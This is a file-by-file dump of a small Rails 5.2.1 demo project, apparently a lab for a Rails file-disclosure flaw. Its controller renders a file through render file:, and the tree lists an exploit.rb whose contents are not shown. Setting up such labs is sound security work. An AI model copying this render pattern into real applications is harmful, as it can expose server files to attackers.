├── demo-5.2.1 ├── log │ └── .keep ├── tmp │ └── .keep ├── vendor │ └── .keep ├── lib │ ├── assets │ │ └── .keep │ └── tasks │ │ └── .keep ├── storage │ └── .keep ├── test │ ├── models │ │ └── .keep │ ├── system │ │ └── .keep │ ├── controllers │ │ ├── .keep │ │ └── demo_controller_test.rb │ ├── fixtures │ │ ├── .keep │ │ └── files │ │ │ └── .keep │ ├── helpers │ │ └── .keep │ ├── integration │ │ └── .keep │ ├── mailers │ │ └── .keep │ ├── application_system_test_case.rb │ └── test_helper.rb ├── public │ ├── favicon.ico │ ├── apple-touch-icon.png │ ├── apple-touch-icon-precomposed.png │ ├── robots.txt │ ├── 500.html │ ├── 422.html │ └── 404.html ├── .ruby-version ├── app │ ├── assets │ │ ├── images │ │ │ └── .keep │ │ ├── javascripts │ │ │ ├── channels │ │ │ │ └── .keep │ │ │ ├── demo.coffee │ │ │ ├── cable.js │ │ │ └── application.js │ │ ├── config │ │ │ └── manifest.js │ │ └── stylesheets │ │ │ ├── demo.scss │ │ │ └── application.css │ ├── models │ │ ├── concerns │ │ │ └── .keep │ │ └── application_record.rb │ ├── controllers │ │ ├── concerns │ │ │ └── .keep │ │ ├── application_controller.rb │ │ └── demo_controller.rb │ ├── views │ │ └── layouts │ │ │ ├── mailer.text.erb │ │ │ ├── application.html.erb │ │ │ └── mailer.html.erb │ ├── helpers │ │ ├── demo_helper.rb │ │ └── application_helper.rb │ ├── jobs │ │ └── application_job.rb │ ├── channels │ │ └── application_cable │ │ │ ├── channel.rb │ │ │ └── connection.rb │ └── mailers │ │ └── application_mailer.rb ├── README.md ├── package.json ├── bin │ ├── rake │ ├── bundle │ ├── rails │ ├── yarn │ ├── update │ └── setup ├── config │ ├── spring.rb │ ├── environment.rb │ ├── routes.rb │ ├── initializers │ │ ├── mime_types.rb │ │ ├── filter_parameter_logging.rb │ │ ├── application_controller_renderer.rb │ │ ├── cookies_serializer.rb │ │ ├── backtrace_silencers.rb │ │ ├── wrap_parameters.rb │ │ ├── assets.rb │ │ ├── inflections.rb │ │ └── content_security_policy.rb │ ├── boot.rb │ ├── cable.yml │ ├── credentials.yml.enc │ ├── database.yml │ ├── application.rb │ ├── locales │ │ └── en.yml │ ├── storage.yml │ ├── puma.rb │ └── environments │ │ ├── test.rb │ │ ├── development.rb │ │ └── production.rb ├── config.ru ├── Rakefile ├── db │ └── seeds.rb ├── .gitignore ├── Gemfile └── Gemfile.lock ├── exploit.rb └── README.md /demo-5.2.1/log/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/tmp/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/vendor/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/lib/assets/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/lib/tasks/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/storage/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/models/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/system/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/public/favicon.ico: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/controllers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/fixtures/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/helpers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/integration/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/mailers/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/.ruby-version: -------------------------------------------------------------------------------- 1 | ruby-2.5.1 -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/images/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/app/models/concerns/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/public/apple-touch-icon.png: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/test/fixtures/files/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/app/controllers/concerns/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/channels/.keep: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/public/apple-touch-icon-precomposed.png: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demo-5.2.1/app/views/layouts/mailer.text.erb: -------------------------------------------------------------------------------- 1 | <%= yield %> 2 | -------------------------------------------------------------------------------- /demo-5.2.1/app/helpers/demo_helper.rb: -------------------------------------------------------------------------------- 1 | module DemoHelper 2 | end 3 | -------------------------------------------------------------------------------- /demo-5.2.1/app/helpers/application_helper.rb: -------------------------------------------------------------------------------- 1 | module ApplicationHelper 2 | end 3 | -------------------------------------------------------------------------------- /demo-5.2.1/app/jobs/application_job.rb: -------------------------------------------------------------------------------- 1 | class ApplicationJob < ActiveJob::Base 2 | end 3 | -------------------------------------------------------------------------------- /demo-5.2.1/README.md: -------------------------------------------------------------------------------- 1 | # README 2 | 3 | ``` 4 | bundle install 5 | rails s -b 0.0.0.0 -e production 6 | ``` 7 | -------------------------------------------------------------------------------- /demo-5.2.1/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "demo-5_2_1", 3 | "private": true, 4 | "dependencies": {} 5 | } 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/controllers/application_controller.rb: -------------------------------------------------------------------------------- 1 | class ApplicationController < ActionController::Base 2 | end 3 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/rake: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require_relative '../config/boot' 3 | require 'rake' 4 | Rake.application.run 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/models/application_record.rb: -------------------------------------------------------------------------------- 1 | class ApplicationRecord < ActiveRecord::Base 2 | self.abstract_class = true 3 | end 4 | -------------------------------------------------------------------------------- /demo-5.2.1/public/robots.txt: -------------------------------------------------------------------------------- 1 | # See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file 2 | -------------------------------------------------------------------------------- /demo-5.2.1/app/channels/application_cable/channel.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Channel < ActionCable::Channel::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/config/manifest.js: -------------------------------------------------------------------------------- 1 | //= link_tree ../images 2 | //= link_directory ../javascripts .js 3 | //= link_directory ../stylesheets .css 4 | -------------------------------------------------------------------------------- /demo-5.2.1/app/channels/application_cable/connection.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Connection < ActionCable::Connection::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/bundle: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 3 | load Gem.bin_path('bundler', 'bundle') 4 | -------------------------------------------------------------------------------- /demo-5.2.1/app/mailers/application_mailer.rb: -------------------------------------------------------------------------------- 1 | class ApplicationMailer < ActionMailer::Base 2 | default from: 'from@example.com' 3 | layout 'mailer' 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/config/spring.rb: -------------------------------------------------------------------------------- 1 | %w[ 2 | .ruby-version 3 | .rbenv-vars 4 | tmp/restart.txt 5 | tmp/caching-dev.txt 6 | ].each { |path| Spring.watch(path) } 7 | -------------------------------------------------------------------------------- /demo-5.2.1/config.ru: -------------------------------------------------------------------------------- 1 | # This file is used by Rack-based servers to start the application. 2 | 3 | require_relative 'config/environment' 4 | 5 | run Rails.application 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/controllers/demo_controller.rb: -------------------------------------------------------------------------------- 1 | class DemoController < ApplicationController 2 | def index 3 | render file: "#{Rails.root}/../README.md" 4 | end 5 | end 6 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/rails: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | APP_PATH = File.expand_path('../config/application', __dir__) 3 | require_relative '../config/boot' 4 | require 'rails/commands' 5 | -------------------------------------------------------------------------------- /demo-5.2.1/config/environment.rb: -------------------------------------------------------------------------------- 1 | # Load the Rails application. 2 | require_relative 'application' 3 | 4 | # Initialize the Rails application. 5 | Rails.application.initialize! 6 | -------------------------------------------------------------------------------- /demo-5.2.1/config/routes.rb: -------------------------------------------------------------------------------- 1 | Rails.application.routes.draw do 2 | # For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html 3 | resources :demo 4 | end 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/views/layouts/application.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Demo521 5 | 6 | 7 | 8 | <%= yield %> 9 | 10 | 11 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/mime_types.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new mime types for use in respond_to blocks: 4 | # Mime::Type.register "text/richtext", :rtf 5 | -------------------------------------------------------------------------------- /demo-5.2.1/test/controllers/demo_controller_test.rb: -------------------------------------------------------------------------------- 1 | require 'test_helper' 2 | 3 | class DemoControllerTest < ActionDispatch::IntegrationTest 4 | # test "the truth" do 5 | # assert true 6 | # end 7 | end 8 | -------------------------------------------------------------------------------- /demo-5.2.1/test/application_system_test_case.rb: -------------------------------------------------------------------------------- 1 | require "test_helper" 2 | 3 | class ApplicationSystemTestCase < ActionDispatch::SystemTestCase 4 | driven_by :selenium, using: :chrome, screen_size: [1400, 1400] 5 | end 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/stylesheets/demo.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the demo controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /demo-5.2.1/config/boot.rb: -------------------------------------------------------------------------------- 1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 2 | 3 | require 'bundler/setup' # Set up gems listed in the Gemfile. 4 | require 'bootsnap/setup' # Speed up boot time by caching expensive operations. 5 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/demo.coffee: -------------------------------------------------------------------------------- 1 | # Place all the behaviors and hooks related to the matching controller here. 2 | # All this logic will automatically be available in application.js. 3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/filter_parameter_logging.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Configure sensitive parameters which will be filtered from the log file. 4 | Rails.application.config.filter_parameters += [:password] 5 | -------------------------------------------------------------------------------- /demo-5.2.1/Rakefile: -------------------------------------------------------------------------------- 1 | # Add your own tasks in files placed in lib/tasks ending in .rake, 2 | # for example lib/tasks/capistrano.rake, and they will automatically be available to Rake. 3 | 4 | require_relative 'config/application' 5 | 6 | Rails.application.load_tasks 7 | -------------------------------------------------------------------------------- /demo-5.2.1/config/cable.yml: -------------------------------------------------------------------------------- 1 | development: 2 | adapter: async 3 | 4 | test: 5 | adapter: async 6 | 7 | production: 8 | adapter: redis 9 | url: <%= ENV.fetch("REDIS_URL") { "redis://localhost:6379/1" } %> 10 | channel_prefix: demo-5_2_1_production 11 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/application_controller_renderer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # ActiveSupport::Reloader.to_prepare do 4 | # ApplicationController.renderer.defaults.merge!( 5 | # http_host: 'example.org', 6 | # https: false 7 | # ) 8 | # end 9 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/cookies_serializer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Specify a serializer for the signed and encrypted cookie jars. 4 | # Valid options are :json, :marshal, and :hybrid. 5 | Rails.application.config.action_dispatch.cookies_serializer = :json 6 | -------------------------------------------------------------------------------- /demo-5.2.1/app/views/layouts/mailer.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | 11 | <%= yield %> 12 | 13 | 14 | -------------------------------------------------------------------------------- /demo-5.2.1/test/test_helper.rb: -------------------------------------------------------------------------------- 1 | ENV['RAILS_ENV'] ||= 'test' 2 | require_relative '../config/environment' 3 | require 'rails/test_help' 4 | 5 | class ActiveSupport::TestCase 6 | # Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order. 7 | fixtures :all 8 | 9 | # Add more helper methods to be used by all tests here... 10 | end 11 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/yarn: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | APP_ROOT = File.expand_path('..', __dir__) 3 | Dir.chdir(APP_ROOT) do 4 | begin 5 | exec "yarnpkg", *ARGV 6 | rescue Errno::ENOENT 7 | $stderr.puts "Yarn executable was not detected in the system." 8 | $stderr.puts "Download Yarn at https://yarnpkg.com/en/docs/install" 9 | exit 1 10 | end 11 | end 12 | -------------------------------------------------------------------------------- /demo-5.2.1/db/seeds.rb: -------------------------------------------------------------------------------- 1 | # This file should contain all the record creation needed to seed the database with its default values. 2 | # The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup). 3 | # 4 | # Examples: 5 | # 6 | # movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }]) 7 | # Character.create(name: 'Luke', movie: movies.first) 8 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/cable.js: -------------------------------------------------------------------------------- 1 | // Action Cable provides the framework to deal with WebSockets in Rails. 2 | // You can generate new channels where WebSocket features live using the `rails generate channel` command. 3 | // 4 | //= require action_cable 5 | //= require_self 6 | //= require_tree ./channels 7 | 8 | (function() { 9 | this.App || (this.App = {}); 10 | 11 | App.cable = ActionCable.createConsumer(); 12 | 13 | }).call(this); 14 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/backtrace_silencers.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. 4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } 5 | 6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. 7 | # Rails.backtrace_cleaner.remove_silencers! 8 | -------------------------------------------------------------------------------- /demo-5.2.1/config/credentials.yml.enc: -------------------------------------------------------------------------------- 1 | uyC5cJnKq9nsPW4V3KlcQn29EYKKrvk+2AuNmTIswIxM09jitAUcs5IrA1VVjoJUqlkPfY7hyWI1E5RLKjGoBkl7azkBygVCvh8MD2QqxKKBK3demtfjVBB2as440TL4K6qPE9wCt50T6gLieIsJ5r3/88sGMPHZhrJflGAYPNdpFBaIPW6eXBnUFH3QWcosBwo9z6ku7KWqYi49QV8mhwwQzwbIxrb63cbO2C34zKnzDQ3UL7ye6XX3nZ9B7ubVkPBG/QFNt5cy/F3JQicj7zRGe94Mz+j66kVBqE8b4lSTcdDoR330DynoA1CANgJhLY17Xh3fXzf69sJa1WGn2mLixQ6g/fA7EZKfBFydpPKjRrPAGkUn1XNMwpUTpRC6c9JmoWIOXFyZhOWSOxXaxSulDeqS56t0aa9N--OW6vPNPO7A2eQQYE--dk4YvVIsGriIoiwZSE07Zw== -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/wrap_parameters.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # This file contains settings for ActionController::ParamsWrapper which 4 | # is enabled by default. 5 | 6 | # Enable parameter wrapping for JSON. You can disable this by setting :format to an empty array. 7 | ActiveSupport.on_load(:action_controller) do 8 | wrap_parameters format: [:json] 9 | end 10 | 11 | # To enable root element in JSON for ActiveRecord objects. 12 | # ActiveSupport.on_load(:active_record) do 13 | # self.include_root_in_json = true 14 | # end 15 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/assets.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Version of your assets, change this if you want to expire all your assets. 4 | Rails.application.config.assets.version = '1.0' 5 | 6 | # Add additional assets to the asset load path. 7 | # Rails.application.config.assets.paths << Emoji.images_path 8 | # Add Yarn node_modules folder to the asset load path. 9 | Rails.application.config.assets.paths << Rails.root.join('node_modules') 10 | 11 | # Precompile additional assets. 12 | # application.js, application.css, and all non-JS/CSS in the app/assets 13 | # folder are already added. 14 | # Rails.application.config.assets.precompile += %w( admin.js admin.css ) 15 | -------------------------------------------------------------------------------- /demo-5.2.1/config/database.yml: -------------------------------------------------------------------------------- 1 | # SQLite version 3.x 2 | # gem install sqlite3 3 | # 4 | # Ensure the SQLite 3 gem is defined in your Gemfile 5 | # gem 'sqlite3' 6 | # 7 | default: &default 8 | adapter: sqlite3 9 | pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %> 10 | timeout: 5000 11 | 12 | development: 13 | <<: *default 14 | database: db/development.sqlite3 15 | 16 | # Warning: The database defined as "test" will be erased and 17 | # re-generated from your development database when you run "rake". 18 | # Do not set this db to the same as development or production. 19 | test: 20 | <<: *default 21 | database: db/test.sqlite3 22 | 23 | production: 24 | <<: *default 25 | database: db/production.sqlite3 26 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/inflections.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new inflection rules using the following format. Inflections 4 | # are locale specific, and you may define rules for as many different 5 | # locales as you wish. All of these examples are active by default: 6 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 7 | # inflect.plural /^(ox)$/i, '\1en' 8 | # inflect.singular /^(ox)en/i, '\1' 9 | # inflect.irregular 'person', 'people' 10 | # inflect.uncountable %w( fish sheep ) 11 | # end 12 | 13 | # These inflection rules are supported but not enabled by default: 14 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 15 | # inflect.acronym 'RESTful' 16 | # end 17 | -------------------------------------------------------------------------------- /demo-5.2.1/config/application.rb: -------------------------------------------------------------------------------- 1 | require_relative 'boot' 2 | 3 | require 'rails/all' 4 | 5 | # Require the gems listed in Gemfile, including any gems 6 | # you've limited to :test, :development, or :production. 7 | Bundler.require(*Rails.groups) 8 | 9 | module Demo521 10 | class Application < Rails::Application 11 | # Initialize configuration defaults for originally generated Rails version. 12 | config.load_defaults 5.2 13 | 14 | # Settings in config/environments/* take precedence over those specified here. 15 | # Application configuration can go into files in config/initializers 16 | # -- all .rb files in that directory are automatically loaded after loading 17 | # the framework and any gems in your application. 18 | end 19 | end 20 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/stylesheets/application.css: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a manifest file that'll be compiled into application.css, which will include all the files 3 | * listed below. 4 | * 5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, or any plugin's 6 | * vendor/assets/stylesheets directory can be referenced here using a relative path. 7 | * 8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the 9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS 10 | * files in this directory. Styles in this file should be added after the last require_* statement. 11 | * It is generally better to create a new file per style scope. 12 | * 13 | *= require_tree . 14 | *= require_self 15 | */ 16 | -------------------------------------------------------------------------------- /demo-5.2.1/app/assets/javascripts/application.js: -------------------------------------------------------------------------------- 1 | // This is a manifest file that'll be compiled into application.js, which will include all the files 2 | // listed below. 3 | // 4 | // Any JavaScript/Coffee file within this directory, lib/assets/javascripts, or any plugin's 5 | // vendor/assets/javascripts directory can be referenced here using a relative path. 6 | // 7 | // It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the 8 | // compiled file. JavaScript code in this file should be added after the last require_* statement. 9 | // 10 | // Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details 11 | // about supported directives. 12 | // 13 | //= require rails-ujs 14 | //= require activestorage 15 | //= require turbolinks 16 | //= require_tree . 17 | -------------------------------------------------------------------------------- /demo-5.2.1/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files for more about ignoring files. 2 | # 3 | # If you find yourself ignoring temporary files generated by your text editor 4 | # or operating system, you probably want to add a global ignore instead: 5 | # git config --global core.excludesfile '~/.gitignore_global' 6 | 7 | # Ignore bundler config. 8 | /.bundle 9 | 10 | # Ignore the default SQLite database. 11 | /db/*.sqlite3 12 | /db/*.sqlite3-journal 13 | 14 | # Ignore all logfiles and tempfiles. 15 | /log/* 16 | /tmp/* 17 | !/log/.keep 18 | !/tmp/.keep 19 | 20 | # Ignore uploaded files in development 21 | /storage/* 22 | !/storage/.keep 23 | 24 | /node_modules 25 | /yarn-error.log 26 | 27 | /public/assets 28 | .byebug_history 29 | 30 | # Ignore master key for decrypting credentials and more. 31 | /config/master.key 32 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/update: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'fileutils' 3 | include FileUtils 4 | 5 | # path to your application root. 6 | APP_ROOT = File.expand_path('..', __dir__) 7 | 8 | def system!(*args) 9 | system(*args) || abort("\n== Command #{args} failed ==") 10 | end 11 | 12 | chdir APP_ROOT do 13 | # This script is a way to update your development environment automatically. 14 | # Add necessary update steps to this file. 15 | 16 | puts '== Installing dependencies ==' 17 | system! 'gem install bundler --conservative' 18 | system('bundle check') || system!('bundle install') 19 | 20 | # Install JavaScript dependencies if using Yarn 21 | # system('bin/yarn') 22 | 23 | puts "\n== Updating database ==" 24 | system! 'bin/rails db:migrate' 25 | 26 | puts "\n== Removing old logs and tempfiles ==" 27 | system! 'bin/rails log:clear tmp:clear' 28 | 29 | puts "\n== Restarting application server ==" 30 | system! 'bin/rails restart' 31 | end 32 | -------------------------------------------------------------------------------- /demo-5.2.1/config/locales/en.yml: -------------------------------------------------------------------------------- 1 | # Files in the config/locales directory are used for internationalization 2 | # and are automatically loaded by Rails. If you want to use locales other 3 | # than English, add the necessary files in this directory. 4 | # 5 | # To use the locales, use `I18n.t`: 6 | # 7 | # I18n.t 'hello' 8 | # 9 | # In views, this is aliased to just `t`: 10 | # 11 | # <%= t('hello') %> 12 | # 13 | # To use a different locale, set it with `I18n.locale`: 14 | # 15 | # I18n.locale = :es 16 | # 17 | # This would use the information in config/locales/es.yml. 18 | # 19 | # The following keys must be escaped otherwise they will not be retrieved by 20 | # the default I18n backend: 21 | # 22 | # true, false, on, off, yes, no 23 | # 24 | # Instead, surround them with single quotes. 25 | # 26 | # en: 27 | # 'true': 'foo' 28 | # 29 | # To learn more, please read the Rails Internationalization guide 30 | # available at http://guides.rubyonrails.org/i18n.html. 31 | 32 | en: 33 | hello: "Hello world" 34 | -------------------------------------------------------------------------------- /demo-5.2.1/bin/setup: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'fileutils' 3 | include FileUtils 4 | 5 | # path to your application root. 6 | APP_ROOT = File.expand_path('..', __dir__) 7 | 8 | def system!(*args) 9 | system(*args) || abort("\n== Command #{args} failed ==") 10 | end 11 | 12 | chdir APP_ROOT do 13 | # This script is a starting point to setup your application. 14 | # Add necessary setup steps to this file. 15 | 16 | puts '== Installing dependencies ==' 17 | system! 'gem install bundler --conservative' 18 | system('bundle check') || system!('bundle install') 19 | 20 | # Install JavaScript dependencies if using Yarn 21 | # system('bin/yarn') 22 | 23 | # puts "\n== Copying sample files ==" 24 | # unless File.exist?('config/database.yml') 25 | # cp 'config/database.yml.sample', 'config/database.yml' 26 | # end 27 | 28 | puts "\n== Preparing database ==" 29 | system! 'bin/rails db:setup' 30 | 31 | puts "\n== Removing old logs and tempfiles ==" 32 | system! 'bin/rails log:clear tmp:clear' 33 | 34 | puts "\n== Restarting application server ==" 35 | system! 'bin/rails restart' 36 | end 37 | -------------------------------------------------------------------------------- /demo-5.2.1/config/initializers/content_security_policy.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Define an application-wide content security policy 4 | # For further information see the following documentation 5 | # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy 6 | 7 | # Rails.application.config.content_security_policy do |policy| 8 | # policy.default_src :self, :https 9 | # policy.font_src :self, :https, :data 10 | # policy.img_src :self, :https, :data 11 | # policy.object_src :none 12 | # policy.script_src :self, :https 13 | # policy.style_src :self, :https 14 | 15 | # # Specify URI for violation reports 16 | # # policy.report_uri "/csp-violation-report-endpoint" 17 | # end 18 | 19 | # If you are using UJS then enable automatic nonce generation 20 | # Rails.application.config.content_security_policy_nonce_generator = -> request { SecureRandom.base64(16) } 21 | 22 | # Report CSP violations to a specified URI 23 | # For further information see the following documentation: 24 | # https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only 25 | # Rails.application.config.content_security_policy_report_only = true 26 | -------------------------------------------------------------------------------- /demo-5.2.1/config/storage.yml: -------------------------------------------------------------------------------- 1 | test: 2 | service: Disk 3 | root: <%= Rails.root.join("tmp/storage") %> 4 | 5 | local: 6 | service: Disk 7 | root: <%= Rails.root.join("storage") %> 8 | 9 | # Use rails credentials:edit to set the AWS secrets (as aws:access_key_id|secret_access_key) 10 | # amazon: 11 | # service: S3 12 | # access_key_id: <%= Rails.application.credentials.dig(:aws, :access_key_id) %> 13 | # secret_access_key: <%= Rails.application.credentials.dig(:aws, :secret_access_key) %> 14 | # region: us-east-1 15 | # bucket: your_own_bucket 16 | 17 | # Remember not to checkin your GCS keyfile to a repository 18 | # google: 19 | # service: GCS 20 | # project: your_project 21 | # credentials: <%= Rails.root.join("path/to/gcs.keyfile") %> 22 | # bucket: your_own_bucket 23 | 24 | # Use rails credentials:edit to set the Azure Storage secret (as azure_storage:storage_access_key) 25 | # microsoft: 26 | # service: AzureStorage 27 | # storage_account_name: your_account_name 28 | # storage_access_key: <%= Rails.application.credentials.dig(:azure_storage, :storage_access_key) %> 29 | # container: your_container_name 30 | 31 | # mirror: 32 | # service: Mirror 33 | # primary: local 34 | # mirrors: [ amazon, google, microsoft ] 35 | -------------------------------------------------------------------------------- /demo-5.2.1/config/puma.rb: -------------------------------------------------------------------------------- 1 | # Puma can serve each request in a thread from an internal thread pool. 2 | # The `threads` method setting takes two numbers: a minimum and maximum. 3 | # Any libraries that use thread pools should be configured to match 4 | # the maximum value specified for Puma. Default is set to 5 threads for minimum 5 | # and maximum; this matches the default thread size of Active Record. 6 | # 7 | threads_count = ENV.fetch("RAILS_MAX_THREADS") { 5 } 8 | threads threads_count, threads_count 9 | 10 | # Specifies the `port` that Puma will listen on to receive requests; default is 3000. 11 | # 12 | port ENV.fetch("PORT") { 3000 } 13 | 14 | # Specifies the `environment` that Puma will run in. 15 | # 16 | environment ENV.fetch("RAILS_ENV") { "development" } 17 | 18 | # Specifies the number of `workers` to boot in clustered mode. 19 | # Workers are forked webserver processes. If using threads and workers together 20 | # the concurrency of the application would be max `threads` * `workers`. 21 | # Workers do not work on JRuby or Windows (both of which do not support 22 | # processes). 23 | # 24 | # workers ENV.fetch("WEB_CONCURRENCY") { 2 } 25 | 26 | # Use the `preload_app!` method when specifying a `workers` number. 27 | # This directive tells Puma to first boot the application and load code 28 | # before forking the application. This takes advantage of Copy On Write 29 | # process behavior so workers use less memory. 30 | # 31 | # preload_app! 32 | 33 | # Allow puma to be restarted by `rails restart` command. 34 | plugin :tmp_restart 35 | -------------------------------------------------------------------------------- /demo-5.2.1/public/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | We're sorry, but something went wrong (500) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

We're sorry, but something went wrong.

62 |
63 |

If you are the application owner check the logs for more information.

64 |
65 | 66 | 67 | -------------------------------------------------------------------------------- /demo-5.2.1/public/422.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The change you wanted was rejected (422) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The change you wanted was rejected.

62 |

Maybe you tried to change something you didn't have access to.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
66 | 67 | 68 | -------------------------------------------------------------------------------- /demo-5.2.1/public/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | The page you were looking for doesn't exist (404) 5 | 6 | 55 | 56 | 57 | 58 | 59 |
60 |
61 |

The page you were looking for doesn't exist.

62 |

You may have mistyped the address or the page may have moved.

63 |
64 |

If you are the application owner check the logs for more information.

65 |
